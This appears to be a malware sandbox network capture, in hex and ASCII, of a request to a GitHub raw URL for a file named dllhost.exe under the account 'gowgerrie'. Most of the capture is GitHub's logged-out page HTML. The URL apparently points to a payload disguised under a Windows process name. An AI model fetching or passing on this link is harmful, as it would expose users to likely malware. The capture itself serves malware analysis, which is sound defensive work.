                                                                                              Data Ascii: der-bottom border-lg-bottom-0 d-block d-lg-flex flex-lg-nowrap flex-lg-items-center"> <a class="HeaderMenu-link no-underline py-3 d-block d-lg-inline-block" data-analytics-event="{&quot;category&quot;:&quot;Header menu top item (logged out)&quot;,&quo
                                                                                              2022-08-10 04:46:43 UTC40INData Raw: 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 69 63 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 50 6c 61 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 50 6c 61 6e 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 70 72 69 63 69 6e 67 22 3e 0a 20 20 20 20 20
                                                                                              Data Ascii: ics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Pricing&quot;,&quot;action&quot;:&quot;click to go to Plans&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:Plans;&quot;}" href="/pricing">
                                                                                              2022-08-10 04:46:43 UTC41INData Raw: 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 69 63 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 45 64 75 63 61 74 69 6f 6e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 45 64 75 63 61 74 69 6f 6e 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 64 75 63 61 74 69 6f 6e 2e 67 69 74 68 75 62 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 45 64 75 63 61 74 69 6f 6e 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e
                                                                                              Data Ascii: down (logged out), Pricing&quot;,&quot;action&quot;:&quot;click to go to Education&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:Education;&quot;}" href="https://education.github.com"> Education</a> </li>
                                                                                              2022-08-10 04:46:43 UTC43INData Raw: 73 69 74 65 2d 73 65 61 72 63 68 2d 66 6f 63 75 73 20 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 69 65 6c 64 20 69 73 2d 63 6c 65 61 72 61 62 6c 65 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 6f 74 6b 65 79 3d 73 2c 2f 0a 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 71 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 74 65 73 74 2d 73 65 6c 65 63 74 6f 72 3d 22 6e 61 76 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 22 0a 20 20 20 20 20 20 20 20 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 75 6e 73 63 6f 70 65 64 2d 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 20 47 69 74 48 75 62 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 73 63 6f 70 65 64 2d 70 6c 61 63
                                                                                              Data Ascii: site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-plac
                                                                                              2022-08-10 04:46:43 UTC44INData Raw: 75 67 67 65 73 74 69 6f 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 22 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 3e 0a 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22
                                                                                              Data Ascii: uggestions-container"> <ul class="d-none js-jump-to-suggestions-template-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-suggestion" role="option"> <a tabindex="-1"
                                                                                              2022-08-10 04:46:43 UTC45INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20 30 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 48 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 56 31
                                                                                              Data Ascii: > <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1
                                                                                              2022-08-10 04:46:43 UTC47INData Raw: 6c 3d 22 69 6e 20 74 68 69 73 20 75 73 65 72 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65 72 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20 47 69 74 48 75 62 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2
                                                                                              Data Ascii: l="in this user"> In this user </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">
                                                                                              2022-08-10 04:46:43 UTC48INData Raw: 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e
                                                                                              Data Ascii: one"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="even
                                                                                              2022-08-10 04:46:43 UTC49INData Raw: 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34
                                                                                              Data Ascii: arch" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.4
                                                                                              2022-08-10 04:46:43 UTC51INData Raw: 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 77 6e 65 72 2d 73 63 6f 70 65 64 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 22 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 3e 0a 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74
                                                                                              Data Ascii: an> </div> </a></li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-cent
                                                                                              2022-08-10 04:46:43 UTC52INData Raw: 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 48 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 56 31 2e 37 35 7a 4d 31 31 2e 37 35 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 37 2e 35 61 2e 37 35 2e 37 35 20 30
                                                                                              Data Ascii: .75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0
                                                                                              2022-08-10 04:46:43 UTC53INData Raw: 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20 47 69 74 48 75 62 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72
                                                                                              Data Ascii: /span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle"></span> </div> <div aria-hidden="tr
                                                                                              2022-08-10 04:46:43 UTC55INData Raw: 2d 2e 36 39 34 2e 30 37 34 2d 31 20 2e 32 30 38 56 32 2e 35 61 31 20 31 20 30 20 30 31 31 2d 31 68 38 7a 4d 35 20 31 32 2e 32 35 76 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2e 32 6c 31 2e 34 35 2d 31 2e 30 38 37 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 33 20 30 4c 38 2e 36 20 31 35 2e 37 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2d 2e 32 76 2d 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 50 72 6f 6a 65 63 74 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22
                                                                                              Data Ascii: -.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16"
                                                                                              2022-08-10 04:46:43 UTC56INData Raw: 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 61 6d 22 20 73 72 63 3d 22 22 20 77 69 64 74 68 3d 22 32 38 22 20 68 65 69 67 68 74 3d 22 32 38 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 66 6c 65 78 2d 61 75 74 6f 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 74 65 78 74 2d 6c 65 66 74 20 6e 6f 2d 77 72 61 70 20 63 73 73 2d 74 72 75 6e 63 61 74 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d
                                                                                              Data Ascii: " aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-
                                                                                              2022-08-10 04:46:43 UTC57INData Raw: 3b 70 61 79 6c 6f 61 64 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 6f 63 61 74 69 6f 6e 5f 69 6e 5f 70 61 67 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 69 74 65 20 68 65 61 64 65 72 20 6d 65 6e 75 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 61 75 74 68 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73
                                                                                              Data Ascii: ;payload&quot;:{&quot;location_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/gowgerrie/reborn/raw/main/04/dllhost.exe&quot;,&quot;us
                                                                                              2022-08-10 04:46:43 UTC59INData Raw: 64 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 69 6e 70 75 74 2d 62 6c 6f 63 6b 20 6a 73 2d 6c 6f 67 69 6e 2d 66 69 65 6c 64 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 72 72 65 63 74 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 61 75 74 6f 66 6f 63 75 73 22 20 2f 3e 0a 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 22 3e 0a 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 22 3e 0a 20 20 20 20 20 20 50 61 73 73 77 6f 72 64 0a 20 20 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22
                                                                                              Data Ascii: d" class="form-control input-block js-login-field" autocapitalize="off" autocorrect="off" autocomplete="username" autofocus="autofocus" /> <div class="position-relative"> <label for="password"> Password </label> <input type="password"
                                                                                              2022-08-10 04:46:43 UTC60INData Raw: 74 69 6d 65 73 74 61 6d 70 5f 73 65 63 72 65 74 22 20 76 61 6c 75 65 3d 22 61 33 31 32 63 61 64 37 65 36 39 39 39 66 30 36 31 37 37 62 30 63 64 39 64 65 61 35 61 64 61 39 31 36 66 61 30 34 33 37 61 36 64 66 37 61 30 65 36 38 32 63 31 65 61 62 65 30 62 34 31 35 38 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 0a 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 6e 61 6d 65 3d 22 63 6f 6d 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 69 67 6e 20 69 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 62 6c 6f 63 6b 20 6a 73 2d 73 69 67 6e 2d 69 6e 2d 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 64 69 73 61 62 6c 65 2d
                                                                                              Data Ascii: timestamp_secret" value="a312cad7e6999f06177b0cd9dea5ada916fa0437a6df7a0e682c1eabe0b4158f" autocomplete="off" class="form-control" /> <input type="submit" name="commit" value="Sign in" class="btn btn-primary btn-block js-sign-in-button" data-disable-
                                                                                              2022-08-10 04:46:43 UTC61INData Raw: 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 73 69 67 6e 20 75 70 20 66 6f 72 20 61 63 63 6f 75 6e 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 53 69 67 6e 20 75 70 3b 72 65 66 5f 6c 6f 63 3a 68 65 61 64 65 72 20 6c 6f 67 67 65 64 20 6f 75 74 26 71 75 6f 74 3b 7d 22 0a 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 53 69 67 6e 20 75 70 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 68
                                                                                              Data Ascii: quot;:&quot;click to sign up for account&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:Sign up;ref_loc:header logged out&quot;}" > Sign up </a> </div> </div> </div></h
                                                                                              2022-08-10 04:46:43 UTC62INData Raw: 46 35 42 0d 0a 32 20 34 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 3e 7b 7b 20 6d 65 73 73 61 67 65 20 7d 7d 3c 2f 64 69 76 3e 0a 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 20 20 3c 2f 74 65 6d 70 6c 61 74 65 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 0a 20 20 3c 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 20 63 6c 61 73 73 3d 22 6a 73 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 73 68 65 6c 66 2d 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 22 20 64 61 74 61 2d 62 61 73 65 2d 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 6f 74 69 66 69 63 61 74 69 6f 6e
                                                                                              Data Ascii: F5B2 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notification
                                                                                              2022-08-10 04:46:43 UTC64INData Raw: 36 4f 7a 4e 45 56 56 63 30 52 55 70 42 59 52 41 51 45 41 41 51 45 44 43 67 51 45 42 51 55 42 41 51 41 41 41 41 41 52 41 51 49 44 55 77 51 68 4d 5a 48 52 6b 71 4c 53 42 52 59 58 51 56 4c 69 42 71 46 43 51 77 66 68 67 68 52 6b 46 56 45 53 59 68 4d 7a 63 59 48 2f 32 67 41 4d 41 77 45 41 41 68 45 44 45 51 41 2f 41 50 6d 74 2b 4b 4c 36 66 48 79 4d 77 44 75 39 53 71 6c 55 46 74 42 52 41 7a 49 6c 4d 42 73 48 64 56 44 43 31 55 4f 42 32 34 51 70 67 4e 46 59 68 38 55 46 42 61 66 61 69 4a 54 41 43 70 50 5a 56 44 74 41 30 51 79 59 57 6c 45 70 68 62 4d 71 68 78 61 55 51 34 74 50 64 55 70 78 62 50 64 49 6c 4d 33 5a 57 4a 63 6e 46 73 30 51 4d 4c 46 53 6e 46 76 6b 67 59 57 30 56 69 43 4c 56 55 70 78 59 6f 55 77 73 43 71 47 41 48 5a 41 32 4a 51 4e 67 69 55 77 74 43 73 4b
                                                                                              Data Ascii: 6OzNEVVc0RUpBYRAQEAAQEDCgQEBQUBAQAAAAARAQIDUwQhMZHRkqLSBRYXQVLiBqFCQwfhghRkFVESYhMzcYH/2gAMAwEAAhEDEQA/APmt+KL6fHyMwDu9SqlUFtBRAzIlMBsHdVDC1UOB24QpgNFYh8UFBafaiJTACpPZVDtA0QyYWlEphbMqhxaUQ4tPdUpxbPdIlM3ZWJcnFs0QMLFSnFvkgYW0ViCLVUpxYoUwsCqGAHZA2JQNgiUwtCsK
                                                                                              2022-08-10 04:46:43 UTC65INData Raw: 63 35 73 50 77 51 4e 39 4e 45 6f 34 42 43 6d 77 43 63 6f 49 74 47 79 41 69 33 68 41 32 4f 79 46 67 34 70 43 6a 67 69 5a 79 59 57 48 5a 49 55 63 46 51 63 45 51 63 41 69 77 52 61 45 53 4e 69 45 55 63 52 73 67 4c 63 4a 42 6d 56 69 5a 48 45 70 6a 42 6e 4c 59 6c 46 62 45 70 6a 42 6b 63 53 70 43 74 69 56 51 63 44 73 6f 44 39 4d 6f 4e 39 4d 71 6c 62 36 5a 33 55 6f 50 30 7a 75 6c 47 2b 6d 64 30 79 59 79 50 30 79 68 57 2b 6e 77 6f 56 73 4f 46 53 68 68 37 4d 6f 6f 34 46 45 44 46 49 56 73 55 69 74 69 6b 47 5a 53 47 4d 67 79 6f 7a 63 4b 41 59 38 49 4e 69 69 68 67 67 47 43 68 51 77 35 56 4b 33 30 77 6f 6f 66 54 47 36 49 33 30 2b 71 4c 51 77 34 55 41 78 62 52 30 41 4e 6f 32 54 6c 56 73 55 53 46 4e 69 